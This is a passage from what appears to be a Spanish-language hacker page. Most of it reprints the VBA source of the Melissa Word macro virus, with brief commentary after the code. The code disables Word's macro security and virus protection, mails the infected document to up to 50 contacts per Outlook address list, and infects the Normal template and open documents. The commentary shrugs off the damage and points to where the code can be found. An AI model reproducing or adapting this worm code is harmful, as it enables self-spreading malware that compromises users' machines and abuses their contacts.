"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo" End If Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> "Melissa" Then If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name = "Melissa" DoAD = True End If If NTI1.Name <> "Melissa" Then If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do While ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If CYA: If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved = True End If 'WORD/Melissa written by Kwyjibo 'Works in both Word 2000 and Word 97 'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 'Word -> Email | Word 97 <--> Word 2000 ... it's a new age! If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." End Sub <--> Descripcion y Notas: Todo el revuelo que se ha montado en torno a este virus. Y tanto, para que luego simplemente se dedique a propagarse en base a las direcciones de correo del libro de direcciones de la victima. Claro, si la gente usase menos el OutLook, o al menos desactivase la ejecucion automatica de macros (se puede hacer facilmente?!?! JA!!) Pero el caso es que hasta los del Gobierno de U.S.A. se han mosqueado con su autor y le han enchironado porque ha creado algo que infecta a los que no tienen cuidado. El caso es que para colmo, el autor distribuia (y distribuye) el codigo libremente, pues es un ejemplo de lo mucho que se puede hacer si las cosas siguen por este camino. Imaginemonos que su intencion, en vez de ser demostrar lo que se puede hacer, hubiese sido destruir informacion... La que se hubiese podido liar. Por cierto, antes de que se me olvide. Teneis algo mas de informacion, y el mismo codigo que aqui arriba en http://www.root.org